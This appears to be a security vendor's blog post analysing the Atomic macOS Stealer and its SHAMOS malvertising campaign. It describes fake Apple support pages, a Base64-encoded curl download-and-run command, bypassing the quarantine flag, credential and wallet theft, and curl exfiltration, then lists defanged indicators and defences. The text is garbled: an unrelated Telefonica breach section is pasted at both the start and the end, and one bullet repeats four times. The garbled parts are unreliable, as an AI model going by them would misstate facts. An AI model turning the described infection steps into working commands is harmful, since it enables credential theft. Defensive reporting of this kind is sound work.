Spanish telecommunications giant Telefonica recently fell victim to a significant cybersecurity breach, showing that even large organizations can be vulnerable. The event highlights how important it is to maintain strong defenses, especially against infostealers, which are designed specifically to steal information.

The Breach: What Happened?

This month (January 2025), Telefonica confirmed unauthorized access to its internal Jira ticketing system. The breach, orchestrated by a group of attackers allegedly linked to the Hellcat ransomware group, resulted in the theft of approximately 2.3 GB of sensitive data. The stolen information included:

• 24,000 employee emails and names
• 500,000 Jira issues and summaries
• 5,000 internal documents
• 236,493 lines of customer data

The Attack Vector: Infostealer Malware

The breach was facilitated by infostealer malware, a type of malicious software designed to harvest sensitive information such as login credentials from infected devices. Numerous employees were reported to be compromised, providing attackers with critical credentials for initial access

• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.

Mac users have long enjoyed a reputation for strong security, but recent attacks are shattering the notion that Macs are immune to malware. One of the latest threats is the Atomic macOS Stealer (AMOS), a sophisticated information-stealing malware that has been actively targeting macOS systems. 

In a campaign between June and August 2025, cybercriminals leveraged malicious ads (malvertising) and fake “Apple Support” pages to trick users into infecting themselves with a new AMOS variant called “SHAMOS.” 

This article explores what the Atomic macOS Stealer is, how the SHAMOS campaign works, and, most importantly, how you can protect against this stealthy Mac malware.

What is Atomic macOS Stealer (AMOS)?

Atomic macOS Stealer (often abbreviated AMOS) is a malware-as-a-service infostealer designed specifically for Apple’s macOS. First emerging in 2023–2024, AMOS quickly became one of the most notorious Mac malware families. 

Operated by a Russia-linked cybercrime group called Cookie Spider, AMOS is essentially “rented out” to other cybercriminals, who use it to harvest sensitive data and cryptocurrency from victims. In other words, Cookie Spider provides the malware for a fee, and affiliates deploy it in their own attacks.

What can AMOS steal? Plenty. Once it infects a Mac, AMOS aggressively hunts for valuable personal and financial data. It can siphon off:

• Keychain passwords and system credentials (giving attackers your saved logins and even Mac account password)
• Files from the Desktop and Documents folders (which often contain important personal or work documents)
• Browser data including saved passwords, browser cookies, and auto-fill information
• Cryptocurrency wallet data from apps like Electrum, Binance, Exodus, Atomic Wallet, Coinomi, and more
• Apple’s Notes and other local app data, as well as system information that might be useful for further exploitation

In July 2025, security researchers discovered that newer versions of AMOS had added a backdoor capability, meaning the malware can open a hidden remote access channel to persist on the Mac and execute commands later. 

The SHAMOS Campaign: Malvertising Mac Users

In mid-2025, a spike of attacks attributed to Cookie Spider introduced a special variant of AMOS called SHAMOS. Between June and August 2025, over 300 organizations were targeted by this campaign. 

The SHAMOS campaign is a textbook example of how modern attackers use social engineering and malvertising to bypass traditional security:

1. First, attacker purchase Google search ads that appear when users search for common Mac help topics. For example, a user Googling something like “how to flush DNS cache on macOS” might see a promoted result at the top that looks like a legitimate tech support page. 

However, the ad links led to fraudulent macOS help websites (with names like mac-safer[.]com or rescue-mac[.]com) that mimicked Apple’s support style.

2. On the malicious site, the content looks like a normal how-to article for fixing your Mac issue. The page would provide a few generic troubleshooting steps. Then, crucially, it instructed the user to run a command in the Terminal app as part of the fix.

   The instructions were presented as if they were an official solution, even including a convenient “copy this command” box.

Figure: A fake “Mac Help” page instructing the user to copy-paste a Terminal command. Source: crowdstrike.com

1. The Terminal command given was a single-line snippet of code that, at a glance, looks complex. In truth, this one-liner was malicious and very powerful. It decoded a Base64-encoded string and piped it into a curl command (a tool to fetch data from the internet).

   By doing so, the command fetched a script from a remote server (icloudservers[.]com) and executed it on the user’s Mac, all in one go.

   This “download and execute” one-liner meant the user effectively installed malware on themselves with a single paste into Terminal. The attackers bypassed Apple’s usual app security checks because the user directly invoked the script via Terminal, sidestepping Gatekeeper protections. (Gatekeeper normally blocks untrusted apps, but it doesn’t stop a user from running commands they authorize in Terminal.)

2. To hide its intent, the command embedded the download URL in an encoded format (Base64). Once run, the retrieved malicious Bash script did two things:
   1. it prompted for or captured the user’s password, 
   2. and then downloaded the SHAMOS malware payload (a Mach-O binary) from the same attacker server. 

Stealing the user’s password could allow the malware to run with elevated privileges (if the user was tricked into entering their admin password), and also gives attackers a valuable credential (the Mac login password itself).

This malvertising campaign cast a wide net. Victims who clicked these fake help ads were observed in the United States, Canada, the UK, Japan, China, Italy, Colombia, Mexico and more. 

Notably, none were in Russia or neighboring CIS countries. This is likely not a coincidence, as many Russian cybercrime gangs deliberately avoid targeting their home region, partly due to underground “rules” and to avoid local law enforcement attention. 

It’s worth mentioning that this one-line install trick isn’t entirely new. Earlier in 2024 and early 2025, other malware like Cuckoo Stealer and even previous AMOS attacks used a similar method via fake Homebrew sites. The success of those campaigns likely encouraged the attackers to reuse the tactic on a broader scale with SHAMOS.

What Happens When SHAMOS Infects a Mac?

Once the user unknowingly executes the Terminal command, the SHAMOS variant of Atomic Stealer gets to work on the Mac. Here’s a breakdown of the attack’s technical payload stage:

The malicious script pulls down the SHAMOS malware file and drops it into the Mac’s temporary directory (/tmp/). It then uses xattr (extended attributes tool) to remove metadata like the quarantine flag from the file. This is another trick to evade Gatekeeper, which might otherwise flag the file as downloaded from the internet. 

After that, the script gives the binary execute permissions (chmod) and launches it.

Once running, SHAMOS first performs anti-VM and anti-sandbox checks to ensure it’s not being monitored by security researchers in a virtual machine. Assuming the coast is clear, it proceeds to scour the system using built-in tools and AppleScript commands. 

The stealer looks for all kinds of data: 

• Cryptocurrency wallet files
• Keychain data
• Saved passwords
• Browser profiles
• Cookies
• Apple Notes, and any other credentials or personal files it can find.

SHAMOS then packages the collected data into a file, typically a ZIP archive named out.zip, and sends it out of the system using curl (an HTTP upload to the attacker’s server). 

Indicators of Compromise (IOCs)

Type	Indicator	Notes / Behaviors
Domains / URLs	– mac-safer[.]com – rescue-mac[.]com – icloudservers[.]com/gm/install.sh – icloudservers[.]com/gm/update – macostutorial[.]com/iterm2/install.sh – macostutorial[.]com/iterm2/update – github[.]com/jeryrymoore/Iterm2	Fake Apple support sites, malvertising landing pages, and malicious GitHub repos.
SHA-256 Hashes	– 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbf547f – eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68 – 4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f – b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5 – a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322 – 95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877	File-based indicators of SHAMOS payloads.
Artifacts / Behaviors	– Malware dropped in /tmp/ directory – Use of xattr to remove quarantine flags – Suspicious chmod granting execution – osascript (AppleScript) activity for reconnaissance / password prompts – Creation of com.finder.helper.plist in LaunchDaemons (persistence) – Bundling stolen data into out.zip and sending via curl – Hidden files in home directory (fake Ledger Live, botnet modules)	Useful for behavioral detection and threat hunting.

How to Defend Against Mac Stealers Like AMOS

The rise of AMOS and similar malware is a wake-up call that even macOS can be targeted en masse. Here are some best practices to protect against such threats:

Never run terminal commands from a website you don’t fully trust.
Legitimate fixes for your Mac problems will rarely require copying a random one-liner from an unknown site. If you’re prompted to do so, seek a second opinion. Check official Apple documentation, or you can even ask ChatGPT.

Use ad blockers
Attackers are bidding on common search keywords to push malicious sites to the top. Using a reputable ad-blocker or an anti-malvertising browser extension can help reduce the chance of landing on a fake site. 

Don’t use work accounts for everyday browsing
Whenever possible, avoid using an admin account for everyday activities on your Mac. If you run as a standard user, even if you mistakenly run a malicious command, it will have to prompt for an admin password.

This extra step could alert you that something’s off (for example, if a “fix” for clearing cache asks for your password, be suspicious). 

Endpoint security and monitoring
Enterprise environments need a modern Endpoint Detection & Response (EDR) or anti-malware solution on Macs. Good security software can catch malicious behaviors, such as unknown processes trying to access sensitive files or scripts using curl to exfiltrate data.

Awareness training
Organizations should consider investing in security awareness training, focusing on the human element. The success of AMOS’s one-line scam hinges on social engineering – convincing a user the command is a helpful fix. 

Regularly remind employees of the risks of copying commands from the internet and encourage a culture of “if in doubt, ask IT.”.

Finally, consider solutions that look beyond the endpoint for signs of compromise. Not all breaches will be caught in real-time on the device, so an extra safety net is valuable.

Twilight Cyber: Protecting Your Organization from Stealer Attacks

Threats like Atomic macOS Stealer require a proactive, multi-layered defense. One such layer is early breach detection beyond the endpoint. Twilight Cyber’s real-time threat protection is designed to catch what others miss.

Twilight’s platform will notice any compromised credentials appearing in illicit markets or breach dumps, often within hours of the breach. This early warning can be a game-changer: instead of finding out weeks later (or never) that a Mac in your company was quietly affected by a stealer, you get an alert almost immediately, allowing you to reset accounts, remove malware from the machine, and prevent a larger incident.

Twilight Cyber’s approach requires no installation on the endpoint and complements your existing Mac security. 

To learn more about how Twilight Cyber can help safeguard your organization from infostealers and other emerging threats, contact us or visit our website for a demo. Stay safe!

Spanish telecommunications giant Telefonica recently fell victim to a significant cybersecurity breach, showing that even large organizations can be vulnerable. The event highlights how important it is to maintain strong defenses, especially against infostealers, which are designed specifically to steal information.

The Breach: What Happened?

This month (January 2025), Telefonica confirmed unauthorized access to its internal Jira ticketing system. The breach, orchestrated by a group of attackers allegedly linked to the Hellcat ransomware group, resulted in the theft of approximately 2.3 GB of sensitive data. The stolen information included:

• 24,000 employee emails and names
• 500,000 Jira issues and summaries
• 5,000 internal documents
• 236,493 lines of customer data

The Attack Vector: Infostealer Malware

The breach was facilitated by infostealer malware, a type of malicious software designed to harvest sensitive information such as login credentials from infected devices. Numerous employees were reported to be compromised, providing attackers with critical credentials for initial access

• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.

Leave your email and get critical updates and alerts from Twilight Cyber straight to your inbox